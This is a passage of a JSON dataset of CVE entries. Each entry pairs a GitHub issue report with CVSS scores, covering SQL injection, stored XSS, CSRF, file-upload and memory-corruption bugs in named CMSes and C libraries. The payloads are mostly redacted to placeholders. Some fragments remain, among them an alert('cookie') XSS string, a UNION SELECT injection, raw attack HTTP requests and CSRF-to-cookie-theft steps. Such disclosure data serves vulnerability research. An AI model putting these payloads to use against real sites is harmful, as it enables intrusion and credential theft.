  52630. "Repo_new": "0xyu/PHP_Learning",
  52631. "Issue_Created_At": "2019-10-02T09:59:14Z",
  52632. "description": "LJCMS Version NUMBERTAG R NUMBERTAG SQL Injection (latest version). Vulnerability Name: LJCMS Version NUMBERTAG R NUMBERTAG FILETAG SQL Injection (latest version) Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG Location PATHTAG Code \uff1a ERRORTAG \u5728sql\u8bed\u53e5 APITAG The parameters APITAG and APITAG are not wrapped in single quotes. Although the global check for gpc is enabled, and the way to post, get, cookie, etc. is passed, addslashes , but there will be no Defensive measures can be injected in queid or topicid . Test\uff1a FILETAG POC: APITAG",
  52633. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52634. "severity": "HIGH",
  52635. "baseScore": 7.5,
  52636. "impactScore": 3.6,
  52637. "exploitabilityScore": 3.9
  52638. },
  52639. {
  52640. "CVE_ID": "CVE-2020-20584",
  52641. "Issue_Url_old": "https://github.com/baigoStudio/baigoSSO/issues/13",
  52642. "Issue_Url_new": "https://github.com/baigostudio/baigosso/issues/13",
  52643. "Repo_new": "baigostudio/baigosso",
  52644. "Issue_Created_At": "2019-10-10T12:40:40Z",
  52645. "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the PATHTAG POC: xss payload: APITAG CODETAG Submit this form, after refreshing, you can find that our xss statement was successfully executed. FILETAG FILETAG FILETAG FILETAG Vulnerability Analysis PATHTAG APITAG Line NUMBERTAG It filters the content on the input. FILETAG FILETAG Continue to follow up on this process FILETAG Because the incoming argument is an array, it will go into the APITAG method of line NUMBERTAG FILETAG FILETAG In the NUMBERTAG line, enter the safe function to filter the input content. FILETAG FILETAG Filtering the input content by xss and sql APITAG we can bypass this. payload: APITAG",
  52646. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52647. "severity": "MEDIUM",
  52648. "baseScore": 6.1,
  52649. "impactScore": 2.7,
  52650. "exploitabilityScore": 2.8
  52651. },
  52652. {
  52653. "CVE_ID": "CVE-2020-20585",
  52654. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/3",
  52655. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/3",
  52656. "Repo_new": "0xyu/PHP_Learning",
  52657. "Issue_Created_At": "2019-10-15T08:04:08Z",
  52658. "description": "Metinfo NUMBERTAG APITAG . Vulnerability Name: Metinfo CMS Background SQL Union Select Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG PATHTAG Line NUMBERTAG ERRORTAG APITAG The input parameters are only filtered by addslashes, but the package is not used during the stitching process. payload: first: Get the id of the data record at APITAG FILETAG second\uff1a\uff1b poc: APITAG post\uff1a CODETAG If the deletion of this poc fails, the first version of the mysql version number is NUMBERTAG if the deletion is successful, the first version of the mysql version number is not NUMBERTAG FILETAG If set the code as NUMBERTAG we can find delete the log data success. FILETAG",
  52659. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52660. "severity": "HIGH",
  52661. "baseScore": 7.5,
  52662. "impactScore": 3.6,
  52663. "exploitabilityScore": 3.9
  52664. },
  52665. {
  52666. "CVE_ID": "CVE-2020-20586",
  52667. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/4",
  52668. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/4",
  52669. "Repo_new": "0xyu/PHP_Learning",
  52670. "Issue_Created_At": "2019-10-16T06:41:13Z",
  52671. "description": "XYHCMS NUMBERTAG CSRF. Hi, I would like to report CSRF vulnerability in XYHCMS NUMBERTAG There is a CSRF vulnerability that can change any information (name, email, password, etc.) of the administrator. POC: APITAG to administrator panel NUMBERTAG open FILETAG ERRORTAG eg: APITAG modification FILETAG NUMBERTAG open FILETAG APITAG modification FILETAG",
  52672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N",
  52673. "severity": "MEDIUM",
  52674. "baseScore": 4.5,
  52675. "impactScore": 3.6,
  52676. "exploitabilityScore": 0.9
  52677. },
  52678. {
  52679. "CVE_ID": "CVE-2020-20593",
  52680. "Issue_Url_old": "https://github.com/alixiaowei/alixiaowei.github.io/issues/1",
  52681. "Issue_Url_new": "https://github.com/alixiaowei/alixiaowei.github.io/issues/1",
  52682. "Repo_new": "alixiaowei/alixiaowei.github.io",
  52683. "Issue_Created_At": "2019-10-13T06:17:06Z",
  52684. "description": "There is one CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a adminuser CODETAG",
  52685. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  52686. "severity": "HIGH",
  52687. "baseScore": 8.0,
  52688. "impactScore": 5.9,
  52689. "exploitabilityScore": 2.1
  52690. },
  52691. {
  52692. "CVE_ID": "CVE-2020-20595",
  52693. "Issue_Url_old": "https://github.com/lock-upme/OPMS/issues/25",
  52694. "Issue_Url_new": "https://github.com/lock-upme/opms/issues/25",
  52695. "Repo_new": "lock-upme/opms",
  52696. "Issue_Created_At": "2019-10-14T15:18:42Z",
  52697. "description": "There is one CSRF vulnerability that can add the account . Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, add a user CSRF Exp: CODETAG We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user. FILETAG FILETAG",
  52698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  52699. "severity": "MEDIUM",
  52700. "baseScore": 6.5,
  52701. "impactScore": 3.6,
  52702. "exploitabilityScore": 2.8
  52703. },
  52704. {
  52705. "CVE_ID": "CVE-2020-20597",
  52706. "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/198",
  52707. "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/198",
  52708. "Repo_new": "xuhuisheng/lemon",
  52709. "Issue_Created_At": "2019-10-15T07:55:26Z",
  52710. "description": "lemon \u5b58\u5728\u5b58\u50a8\u578bXSS. \u60a8\u597d\uff0c\u6211\u5728lemon NUMBERTAG SS \u6709\u6548\u8d1f\u8377\uff1a APITAG alert('cookie') APITAG PATHTAG line NUMBERTAG ERRORTAG APITAG \u5229\u7528\uff1a APITAG POC CODETAG \u7ed3\u679c\uff1a \u6267\u884c\u4e86js\u8bed\u53e5\uff0c\u5e76\u5f39\u6846 FILETAG",
  52711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52712. "severity": "MEDIUM",
  52713. "baseScore": 6.1,
  52714. "impactScore": 2.7,
  52715. "exploitabilityScore": 2.8
  52716. },
  52717. {
  52718. "CVE_ID": "CVE-2020-20598",
  52719. "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/199",
  52720. "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/199",
  52721. "Repo_new": "xuhuisheng/lemon",
  52722. "Issue_Created_At": "2019-10-15T11:40:35Z",
  52723. "description": "Csrf + Xss combination Can be obtained user cookie. Place of backstage exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, the component information is automatically add. There is an xss in the place of Editing component FILETAG We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie Csrf Exp: ERRORTAG FILETAG",
  52724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52725. "severity": "MEDIUM",
  52726. "baseScore": 6.1,
  52727. "impactScore": 2.7,
  52728. "exploitabilityScore": 2.8
  52729. },
  52730. {
  52731. "CVE_ID": "CVE-2020-20600",
  52732. "Issue_Url_old": "https://github.com/alixiaowei/cve_test/issues/2",
  52733. "Issue_Url_new": "https://github.com/alixiaowei/cve_test/issues/2",
  52734. "Repo_new": "alixiaowei/cve_test",
  52735. "Issue_Created_At": "2019-10-16T10:06:25Z",
  52736. "description": "APITAG beta stored Cross Site Scripting Vulnerability. Vulnerability Name: Metinfo CMS stored XSS Vulnerability Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG beta Payload: APITAG file path: PATHTAG line NUMBERTAG code in line NUMBERTAG ERRORTAG Can see APITAG value, did some not filter, and judge some conditions after, and finally write APITAG save to the database in POC\uff1a CODETAG FILETAG FILETAG",
  52737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52738. "severity": "MEDIUM",
  52739. "baseScore": 5.4,
  52740. "impactScore": 2.7,
  52741. "exploitabilityScore": 2.3
  52742. },
  52743. {
  52744. "CVE_ID": "CVE-2020-20605",
  52745. "Issue_Url_old": "https://github.com/xuzijia/blog/issues/4",
  52746. "Issue_Url_new": "https://github.com/xuzijia/blog/issues/4",
  52747. "Repo_new": "xuzijia/blog",
  52748. "Issue_Created_At": "2019-09-26T08:15:10Z",
  52749. "description": "Blog CMS NUMBERTAG feedback have a xss vulnerability. \u672a\u8fdb\u884c\u8fc7\u6ee4\u4ee5\u53ca\u5b9e\u4f53\u5316\u7528\u6237\u8f93\u5165\u7684\u5185\u5bb9 \u6709\u6548\u8d1f\u8377\uff1a PATHTAG ) APITAG PATHTAG APITAG \u4ee3\u7801\uff1a FILETAG \u7ed3\u679c\uff1a FILETAG FILETAG",
  52750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52751. "severity": "MEDIUM",
  52752. "baseScore": 6.1,
  52753. "impactScore": 2.7,
  52754. "exploitabilityScore": 2.8
  52755. },
  52756. {
  52757. "CVE_ID": "CVE-2020-20642",
  52758. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/5",
  52759. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/5",
  52760. "Repo_new": "weng-xianhu/eyoucms",
  52761. "Issue_Created_At": "2019-10-09T08:29:30Z",
  52762. "description": "CSRF vulnerability can add htm page to generate XSS. This CSRF vulnerability can add htm page and execute js code such as XSS. This problem was found in APITAG NUMBERTAG This CSRF vulnerability can add an htm page via APITAG After the administrator logs in, he visits the page constructed by the attacker and triggers exp. The htm page will be created in the specified path. The page contains the attacker's js code, which can cause XSS or other problems. CODETAG Poc request packet FILETAG After the csrf vulnerability is triggered, the htm page is created and the reflective XSS is executed. FILETAG",
  52763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52764. "severity": "HIGH",
  52765. "baseScore": 8.8,
  52766. "impactScore": 5.9,
  52767. "exploitabilityScore": 2.8
  52768. },
  52769. {
  52770. "CVE_ID": "CVE-2020-20645",
  52771. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/6",
  52772. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/6",
  52773. "Repo_new": "weng-xianhu/eyoucms",
  52774. "Issue_Created_At": "2019-10-12T07:01:02Z",
  52775. "description": "There is a stored xss in basic_information(\u57fa\u672c\u4fe1\u606f). Tested in NUMBERTAG ersion FILETAG FILETAG",
  52776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52777. "severity": "MEDIUM",
  52778. "baseScore": 5.4,
  52779. "impactScore": 2.7,
  52780. "exploitabilityScore": 2.3
  52781. },
  52782. {
  52783. "CVE_ID": "CVE-2020-20657",
  52784. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/1",
  52785. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/1",
  52786. "Repo_new": "fcovatti/libiec_iccp_mod",
  52787. "Issue_Created_At": "2019-10-10T02:31:18Z",
  52788. "description": "Potential heap buffer overflow found at mms_client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG __ASAN Output__: ERRORTAG",
  52789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52790. "severity": "HIGH",
  52791. "baseScore": 7.5,
  52792. "impactScore": 3.6,
  52793. "exploitabilityScore": 3.9
  52794. },
  52795. {
  52796. "CVE_ID": "CVE-2020-20658",
  52797. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/2",
  52798. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/2",
  52799. "Repo_new": "fcovatti/libiec_iccp_mod",
  52800. "Issue_Created_At": "2019-10-10T03:44:20Z",
  52801. "description": "Potential heap buffer overflow found at mms_client_example1.c different from issues1. Hello, I found a potential heap buffer overflow in PATHTAG but unable to locate the trace code, however the deeper cause is found in: PATHTAG when the program tries to calloc a large space, causing the heap buffer overflow. Below are steps followed to reproduce crash Download latest source code from: PATHTAG compiled with clang and APITAG CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" before make Row data FILETAG ASAN Output: ERRORTAG",
  52802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52803. "severity": "HIGH",
  52804. "baseScore": 7.5,
  52805. "impactScore": 3.6,
  52806. "exploitabilityScore": 3.9
  52807. },
  52808. {
  52809. "CVE_ID": "CVE-2020-20662",
  52810. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/6",
  52811. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/6",
  52812. "Repo_new": "fcovatti/libiec_iccp_mod",
  52813. "Issue_Created_At": "2019-10-10T07:02:23Z",
  52814. "description": "Heap buffer overflow found at mms_client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make __ROW data__: APITAG APITAG __ASAN Output__: ERRORTAG",
  52815. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52816. "severity": "MEDIUM",
  52817. "baseScore": 6.5,
  52818. "impactScore": 3.6,
  52819. "exploitabilityScore": 2.8
  52820. },
  52821. {
  52822. "CVE_ID": "CVE-2020-20663",
  52823. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/7",
  52824. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/7",
  52825. "Repo_new": "fcovatti/libiec_iccp_mod",
  52826. "Issue_Created_At": "2019-10-10T07:08:43Z",
  52827. "description": "Heap buffer overflow found at mms_client_example1.c different from issues NUMBERTAG Hello, I found a potential heap buffer overflow in PATHTAG but unable to locate the trace code, however the deeper cause is found in: PATHTAG when the program tries to calloc a large space, causing the heap buffer overflow. APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make APITAG data__ FILETAG ASAN Output: ERRORTAG",
  52828. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52829. "severity": "MEDIUM",
  52830. "baseScore": 6.5,
  52831. "impactScore": 3.6,
  52832. "exploitabilityScore": 2.8
  52833. },
  52834. {
  52835. "CVE_ID": "CVE-2020-20664",
  52836. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/8",
  52837. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/8",
  52838. "Repo_new": "fcovatti/libiec_iccp_mod",
  52839. "Issue_Created_At": "2019-10-11T02:11:50Z",
  52840. "description": "SEGV found in server_example1. Hello, I found a __SEGV__ in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make APITAG data__ FILETAG __ASAN Output__ ERRORTAG",
  52841. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52842. "severity": "MEDIUM",
  52843. "baseScore": 6.5,
  52844. "impactScore": 3.6,
  52845. "exploitabilityScore": 2.8
  52846. },
  52847. {
  52848. "CVE_ID": "CVE-2020-20665",
  52849. "Issue_Url_old": "https://github.com/cloudwu/rudp/issues/6",
  52850. "Issue_Url_new": "https://github.com/cloudwu/rudp/issues/6",
  52851. "Repo_new": "cloudwu/rudp",
  52852. "Issue_Created_At": "2019-11-06T08:21:48Z",
  52853. "description": "Memory leak found at APITAG Hello, I found a __MEMORY LEAK__ in APITAG APITAG are steps followed to reproduce crash__ Download latest source code from: URLTAG compiled with clang and ASAN APITAG before make __ASAN Output__ ''' APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG e9d NUMBERTAG PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). ''' it seems that you have a double free issue.",
  52854. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52855. "severity": "HIGH",
  52856. "baseScore": 7.5,
  52857. "impactScore": 3.6,
  52858. "exploitabilityScore": 3.9
  52859. },
  52860. {
  52861. "CVE_ID": "CVE-2020-20670",
  52862. "Issue_Url_old": "https://github.com/yilezhu/Czar.Cms/issues/6",
  52863. "Issue_Url_new": "https://github.com/yilezhu/czar.cms/issues/6",
  52864. "Repo_new": "yilezhu/czar.cms",
  52865. "Issue_Created_At": "2019-10-11T08:36:25Z",
  52866. "description": "Arbitrary file upload vulnerability exists in the background. Can upload Html Cause fishing attacks \uff0c APITAG Code execution FILETAG url \uff1a URLTAG poc NUMBERTAG Content Disposition: form data; name=\"file\"; APITAG Content Type: application/octet stream hello world NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"size NUMBERTAG FILETAG",
  52867. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52868. "severity": "HIGH",
  52869. "baseScore": 8.8,
  52870. "impactScore": 5.9,
  52871. "exploitabilityScore": 2.8
  52872. },
  52873. {
  52874. "CVE_ID": "CVE-2020-20671",
  52875. "Issue_Url_old": "https://github.com/Kitesky/KiteCMS/issues/3",
  52876. "Issue_Url_new": "https://github.com/kitesky/kitecms/issues/3",
  52877. "Repo_new": "kitesky/kitecms",
  52878. "Issue_Created_At": "2019-10-12T03:14:35Z",
  52879. "description": "There is CSRF and Arbitrary file upload vulnerability getshell. CSRF : add administrator user Edit Upload options Upload php file getshell CSRF POC: FILETAG Edit Upload options FILETAG Upload php file getshell FILETAG FILETAG FILETAG",
  52880. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52881. "severity": "HIGH",
  52882. "baseScore": 8.8,
  52883. "impactScore": 5.9,
  52884. "exploitabilityScore": 2.8
  52885. },
  52886. {
  52887. "CVE_ID": "CVE-2020-20691",
  52888. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/461",
  52889. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/461",
  52890. "Repo_new": "monstra-cms/monstra",
  52891. "Issue_Created_At": "2019-10-11T08:24:25Z",
  52892. "description": "bypassed extension filter in uploading process different before. Brief of this vulnerability",
  52893. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  52894. "severity": "MEDIUM",
  52895. "baseScore": 6.5,
  52896. "impactScore": 2.5,
  52897. "exploitabilityScore": 3.9
  52898. },
  52899. {
  52900. "CVE_ID": "CVE-2020-20692",
  52901. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/50",
  52902. "Issue_Url_new": "https://github.com/gilacms/gila/issues/50",
  52903. "Repo_new": "gilacms/gila",
  52904. "Issue_Created_At": "2019-10-13T09:33:27Z",
  52905. "description": "SQL injection in Gila CMS version NUMBERTAG I installed the latest version of APITAG APITAG After the administrator log in to the website, the search for the sql injection vulnerability exists in the content >pages >posts page. Vulnerability related code The vulnerability related code is in lines NUMBERTAG to NUMBERTAG of PATHTAG the parameter $_GET is not filtered, and the line is directly brought into the APITAG function to perform data query in line NUMBERTAG resulting in sql injection. ERRORTAG Vulnerability certificate Visit URLTAG you can see that the returned content has the result of the sql statement execution is NUMBERTAG Send get packet ERRORTAG Response package CODETAG",
  52906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  52907. "severity": "HIGH",
  52908. "baseScore": 7.2,
  52909. "impactScore": 5.9,
  52910. "exploitabilityScore": 1.2
  52911. },
  52912. {
  52913. "CVE_ID": "CVE-2020-20693",
  52914. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/51",
  52915. "Issue_Url_new": "https://github.com/gilacms/gila/issues/51",
  52916. "Repo_new": "gilacms/gila",
  52917. "Issue_Created_At": "2019-10-13T16:20:44Z",
  52918. "description": "There is a CSRF vulnerability that can add an administrator account. CSRF vulnerability There is a CSRF vulnerability to add an administrator account After the administrator has logged in, open the following page poc APITAG add an administrator account ERRORTAG Screenshots NUMBERTAG Access dangerous pages FILETAG FILETAG NUMBERTAG Found that an administrator has been added FILETAG Impact version Version NUMBERTAG",
  52919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52920. "severity": "HIGH",
  52921. "baseScore": 8.8,
  52922. "impactScore": 5.9,
  52923. "exploitabilityScore": 2.8
  52924. },
  52925. {
  52926. "CVE_ID": "CVE-2020-20695",
  52927. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/52",
  52928. "Issue_Url_new": "https://github.com/gilacms/gila/issues/52",
  52929. "Repo_new": "gilacms/gila",
  52930. "Issue_Created_At": "2019-10-14T03:08:48Z",
  52931. "description": "Storage type xss by uploading svg files. Version impacted NUMBERTAG ulnerability details(POC) The file with the suffix .svg saves the following code. After uploading to the server, you can execute any js code. If the ordinary user has permission to upload files, the administrator user accidentally accesses the malicious svg uploaded by the user, then the ordinary user. It is possible to obtain the cookie information of the administrator user, resulting in an increase in the rights of the ordinary user. It is dangerous for the system to allow uploading svg files. CODETAG FILETAG Access the file and find that malicious code has been executed FILETAG",
  52932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52933. "severity": "MEDIUM",
  52934. "baseScore": 5.4,
  52935. "impactScore": 2.7,
  52936. "exploitabilityScore": 2.3
  52937. },
  52938. {
  52939. "CVE_ID": "CVE-2020-20696",
  52940. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/53",
  52941. "Issue_Url_new": "https://github.com/gilacms/gila/issues/53",
  52942. "Repo_new": "gilacms/gila",
  52943. "Issue_Created_At": "2019-10-15T03:43:22Z",
  52944. "description": "FILETAG FILETAG Repair opinion Encoding the submitted content of the Tags content",
  52945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52946. "severity": "MEDIUM",
  52947. "baseScore": 5.4,
  52948. "impactScore": 2.7,
  52949. "exploitabilityScore": 2.3
  52950. },
  52951. {
  52952. "CVE_ID": "CVE-2020-20739",
  52953. "Issue_Url_old": "https://github.com/libvips/libvips/issues/1419",
  52954. "Issue_Url_new": "https://github.com/libvips/libvips/issues/1419",
  52955. "Repo_new": "libvips/libvips",
  52956. "Issue_Created_At": "2019-09-03T11:59:50Z",
  52957. "description": "Uninitialized variable: mode in function APITAG PATHTAG When the output file does not contain a \":\"\uff0cthe uninitialization of the mode causes the stack information to leak. This may cause the leakage of remote server path. APITAG APITAG",
  52958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  52959. "severity": "MEDIUM",
  52960. "baseScore": 5.3,
  52961. "impactScore": 1.4,
  52962. "exploitabilityScore": 3.9
  52963. },
  52964. {
  52965. "CVE_ID": "CVE-2020-20740",
  52966. "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/14",
  52967. "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/14",
  52968. "Repo_new": "enferex/pdfresurrect",
  52969. "Issue_Created_At": "2020-07-24T02:17:52Z",
  52970. "description": "The lack of a complete magic check leads to heap buffer overflow in APITAG commit APITAG os version: ubuntu NUMBERTAG CODETAG ERRORTAG build arg\uff1a ERRORTAG FILETAG",
  52971. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52972. "severity": "HIGH",
  52973. "baseScore": 7.8,
  52974. "impactScore": 5.9,
  52975. "exploitabilityScore": 1.8
  52976. },
  52977. {
  52978. "CVE_ID": "CVE-2020-20781",
  52979. "Issue_Url_old": "https://github.com/forget-code/ucms/issues/1",
  52980. "Issue_Url_new": "https://github.com/forget-code/ucms/issues/1",
  52981. "Repo_new": "forget-code/ucms",
  52982. "Issue_Created_At": "2019-10-21T02:27:11Z",
  52983. "description": "The title, key words, description and content of the article are all stored XSS.. The title and key words of the article can be described by using payload NUMBERTAG APITAG APITAG use payload: APITAG",
  52984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52985. "severity": "MEDIUM",
  52986. "baseScore": 5.4,
  52987. "impactScore": 2.7,
  52988. "exploitabilityScore": 2.3
  52989. },
  52990. {
  52991. "CVE_ID": "CVE-2020-20796",
  52992. "Issue_Url_old": "https://github.com/FlameNET/FlameCMS/issues/24",
  52993. "Issue_Url_new": "https://github.com/flamenet/flamecms/issues/24",
  52994. "Repo_new": "flamenet/flamecms",
  52995. "Issue_Created_At": "2019-10-16T16:47:47Z",
  52996. "description": "sql injection vulnerability . hello There is a sql injection vulnerability here\uff1a FILETAG APITAG URLTAG APITAG payload: id NUMBERTAG UNION ALL SELECT APITAG APITAG",
  52997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52998. "severity": "CRITICAL",
  52999. "baseScore": 9.8,
  53000. "impactScore": 5.9,
  53001. "exploitabilityScore": 3.9
  53002. },
  53003. {
  53004. "CVE_ID": "CVE-2020-20797",
  53005. "Issue_Url_old": "https://github.com/FlameNET/FlameCMS/issues/26",
  53006. "Issue_Url_new": "https://github.com/flamenet/flamecms/issues/26",
  53007. "Repo_new": "flamenet/flamecms",
  53008. "Issue_Created_At": "2019-10-17T10:02:26Z",
  53009. "description": "sql injection vulnerability NUMBERTAG Hello There is a Time based blind injection vulnerability here too\uff1a PATHTAG APITAG APITAG poc \uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG mprtcl APITAG c8d NUMBERTAG c NUMBERTAG ba NUMBERTAG c8a'|'das NUMBERTAG a NUMBERTAG f NUMBERTAG afe NUMBERTAG f NUMBERTAG a NUMBERTAG APITAG APITAG XDEBUG_SESSION NUMBERTAG Upgrade Insecure Requests NUMBERTAG csrftoken NUMBERTAG d NUMBERTAG c NUMBERTAG ad NUMBERTAG fa2 b3be APITAG APITAG APITAG Time based injection and need to write the new APITAG everytime to test APITAG APITAG APITAG",
  53010. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53011. "severity": "CRITICAL",
  53012. "baseScore": 9.8,
  53013. "impactScore": 5.9,
  53014. "exploitabilityScore": 3.9
  53015. },
  53016. {
  53017. "CVE_ID": "CVE-2020-20799",
  53018. "Issue_Url_old": "https://github.com/blackjliuyun/cvetest/issues/1",
  53019. "Issue_Url_new": "https://github.com/blackjliuyun/cvetest/issues/1",
  53020. "Repo_new": "blackjliuyun/cvetest",
  53021. "Issue_Created_At": "2019-11-19T05:08:06Z",
  53022. "description": "jeecms commentary exists storage type xss. product: jeecms \uff08 FILETAG \uff09 version NUMBERTAG There is a storage type of xss, which is triggered in the foreground after the user submits the comment and the background audit is passed. poc\uff1a POST /usercomment HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Content Type: application/json JEECMS Auth Token: APITAG APITAG APITAG APITAG Redirect Header: false X Requested With: APITAG Content Length NUMBERTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG mprtcl APITAG c8d NUMBERTAG c NUMBERTAG ba NUMBERTAG c8a'|'das NUMBERTAG a NUMBERTAG f NUMBERTAG afe NUMBERTAG f NUMBERTAG a NUMBERTAG APITAG zh_choose=s; APITAG JIDENTITY=be NUMBERTAG c NUMBERTAG f NUMBERTAG d NUMBERTAG b0e df NUMBERTAG cdd9; APITAG _site_id_cookie NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG",
  53023. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53024. "severity": "MEDIUM",
  53025. "baseScore": 5.4,
  53026. "impactScore": 2.7,
  53027. "exploitabilityScore": 2.3
  53028. },
  53029. {
  53030. "CVE_ID": "CVE-2020-20907",
  53031. "Issue_Url_old": "https://github.com/cby234/cve_request/issues/2",
